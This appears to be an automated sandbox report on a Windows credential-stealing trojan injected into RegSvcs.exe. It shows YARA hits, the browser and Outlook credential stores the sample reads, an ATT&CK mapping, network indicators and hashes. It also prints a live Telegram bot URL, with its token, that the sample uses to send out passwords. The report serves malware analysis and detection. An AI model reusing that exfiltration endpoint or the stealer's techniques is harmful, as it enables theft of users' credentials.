Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match -- File source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_81
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_XP
Source: mnXS9meqtB.exe -- Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_XPe
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_VISTA
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_7
Source: mnXS9meqtB.exe -- Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match -- File source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00358C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0035923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (a number in front of a technique is the count of signatures mapped to it; cells without a number are unmatched placeholders of the matrix template)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 137 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 2 Valid Accounts | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 212 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

Source | Detection | Scanner | Label
mnXS9meqtB.exe | 57% | Virustotal |
mnXS9meqtB.exe | 79% | ReversingLabs | Win32.Trojan.AutoitInject
mnXS9meqtB.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.16.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org | RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695 | RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4777410564.00000000031C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189x | RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000318C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1589080
                                                      Start date and time:2025-01-11 09:14:25 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 1s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:mnXS9meqtB.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 296
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:15:29 | API Interceptor | 11205867x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Exodus.txt.lnk | malicious | StormKitty |
149.154.167.220 | h8izmpp1ZM.exe | malicious | MassLogger RAT |
149.154.167.220 | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | JWPRnfqs3n.exe | malicious | MassLogger RAT |
149.154.167.220 | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | ZaRP7yvL1J.exe | malicious | MassLogger RAT |
149.154.167.220 | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | 14lVOjBoI2.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | Qg79mitNvD.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.16.1 | 8L6MBxaJ2m.exe | malicious | FormBook | www.rafconstrutora.online/0xli/
104.21.16.1 | NFhRxwbegd.exe | malicious | FormBook | www.kkpmoneysocial.top/86am/
104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
193.122.6.168 | gGI2gVBI0f.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | ZpYFG94D4C.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ZaRP7yvL1J.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | prgNb8YFEA.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | fpIGwanLZi.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | h1HIe1rt4D.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | aS39AS7b0P.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | gGI2gVBI0f.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | ZpYFG94D4C.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | h8izmpp1ZM.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | JWPRnfqs3n.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
checkip.dyndns.com | b6AGgIJ87g.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
reallyfreegeoip.org | aS39AS7b0P.exe | malicious | Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | gGI2gVBI0f.exe | malicious | MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | ZpYFG94D4C.exe | malicious | Snake Keylogger | 104.21.48.1
reallyfreegeoip.org | h8izmpp1ZM.exe | malicious | MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | JWPRnfqs3n.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | b6AGgIJ87g.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
api.telegram.org | Exodus.txt.lnk | malicious | StormKitty | 149.154.167.220
api.telegram.org | h8izmpp1ZM.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | JWPRnfqs3n.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | 14lVOjBoI2.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | Qg79mitNvD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | aS39AS7b0P.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | gGI2gVBI0f.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | ZpYFG94D4C.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | h8izmpp1ZM.exe | malicious | MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | b6AGgIJ87g.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | Qg79mitNvD.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
TELEGRAMRU | Exodus.txt.lnk | malicious | StormKitty | 149.154.167.220
TELEGRAMRU | h8izmpp1ZM.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | JWPRnfqs3n.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | 14lVOjBoI2.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | Qg79mitNvD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | 8L6MBxaJ2m.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | aS39AS7b0P.exe | malicious | Snake Keylogger | 104.21.112.1
CLOUDFLARENETUS | gGI2gVBI0f.exe | malicious | MassLogger RAT | 104.21.64.1
CLOUDFLARENETUS | ZpYFG94D4C.exe | malicious | Snake Keylogger | 104.21.48.1
CLOUDFLARENETUS | Exodus.txt.lnk | malicious | StormKitty | 104.16.185.241
CLOUDFLARENETUS | dhPWt112uC.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | h8izmpp1ZM.exe | malicious | MassLogger RAT | 104.21.32.1
CLOUDFLARENETUS | z6tNjJC614.exe | malicious | FormBook | 104.21.42.77
CLOUDFLARENETUS | b0cQukXPAl.exe | malicious | LummaC | 104.21.56.70
CLOUDFLARENETUS | x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
Match 54328bd36c14bd82ddaa0c04b25ed9ad:
aS39AS7b0P.exe | malicious | Snake Keylogger | 104.21.16.1
gGI2gVBI0f.exe | malicious | MassLogger RAT | 104.21.16.1
ZpYFG94D4C.exe | malicious | Snake Keylogger | 104.21.16.1
h8izmpp1ZM.exe | malicious | MassLogger RAT | 104.21.16.1
x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
JWPRnfqs3n.exe | malicious | MassLogger RAT | 104.21.16.1
c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 104.21.16.1
b6AGgIJ87g.exe | malicious | Snake Keylogger | 104.21.16.1
ZaRP7yvL1J.exe | malicious | MassLogger RAT | 104.21.16.1
grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 104.21.16.1
Match 3b5074b1b5d032e5620f69f9f700ff0e:
Exodus.txt.lnk | malicious | StormKitty | 149.154.167.220
dhPWt112uC.exe | malicious | AgentTesla | 149.154.167.220
h8izmpp1ZM.exe | malicious | MassLogger RAT | 149.154.167.220
x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
lrw6UNGsUC.exe | malicious | XWorm | 149.154.167.220
JWPRnfqs3n.exe | malicious | MassLogger RAT | 149.154.167.220
c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
ZaRP7yvL1J.exe | malicious | MassLogger RAT | 149.154.167.220
grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
14lVOjBoI2.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\mnXS9meqtB.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):196456
                                                                          Entropy (8bit):7.9684229485300335
                                                                          Encrypted:false
                                                                          SSDEEP:3072:wQAp11Jo1xEkgtNDHDLChYjMEvjI51B37UupA6Rt58dCwhL3zREw3mfQRKgVZNdO:DAp1oTEDHLljRELB3r3/58BJ3uiDdPRk
                                                                          MD5:0CBD5EDA08E436ACF87C9CFEC323DAFF
                                                                          SHA1:ABF4A95FE000130E72D51C92E7D2C8314F072F6F
                                                                          SHA-256:C7373CBC84EC833A748CFA86BBAEE7B1D054807AB27D1032BA4759B828C62694
                                                                          SHA-512:50D04DB63F064C0A37F0011DF9AF3F88D625BB1F8D4FCEB05026CF3ED8428CCC962FCAF55FDDC6573AC3219E1DC76BCBDBC9AEF18DC826EEB2272160A0C556F5
                                                                          Malicious:false
                                                                          Reputation:low
Preview:
                                                                          Process:C:\Users\user\Desktop\mnXS9meqtB.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):209920
                                                                          Entropy (8bit):7.758541529615541
                                                                          Encrypted:false
                                                                          SSDEEP:6144:WpiX6xTCY9RDMw9i8NInVW1tQjJcXgha1:WpiXuT5DxipnVWtQ81
                                                                          MD5:BC54AF7115852A8594843BD69389A7C7
                                                                          SHA1:6A7D52C81EF7FAAF380CAEC43D403B10C0CFB67F
                                                                          SHA-256:63C0C8567474E91133E93701D8BB4B8EDA905A50060A9E96FAAD249763B13BF1
                                                                          SHA-512:D1847B2C1AED047776CA3DDC6EC71B23C80AF94D13339EFD9DD0B188DE36B7FDE239AE37D92C2700C624A32DF3DE6026CA4A5BB7F5FBD1B1A7AA50C0D433E407
                                                                          Malicious:false
                                                                          Reputation:low
Preview:
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.049902904241748
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:mnXS9meqtB.exe
                                                                          File size:1'132'544 bytes
                                                                          MD5:aa367f8d203cd02f8a82a1a351baf271
                                                                          SHA1:60c3c395682962497b9425572b869052d2eb4135
                                                                          SHA256:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1
                                                                          SHA512:e8ab9600374e55ceb2e216ebd45c33517d0e94eab227b5270c84a13102c65fa801eb12d29ac59ff667f47bf03d718f1d1f19a02ad33a1e007dbfdd2db761aea2
                                                                          SSDEEP:24576:htb20pkaCqT5TBWgNQ7aFIOvBYt/hkIM6A:yVg5tQ7aFvGk5
                                                                          TLSH:AA35CF1373DD8361C7B25273BA657B41BEBF782506A1F86B2FD8093DE820122525E673
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                          Icon Hash:aaf3e3e3938382a0
                                                                          Entrypoint:0x425f74
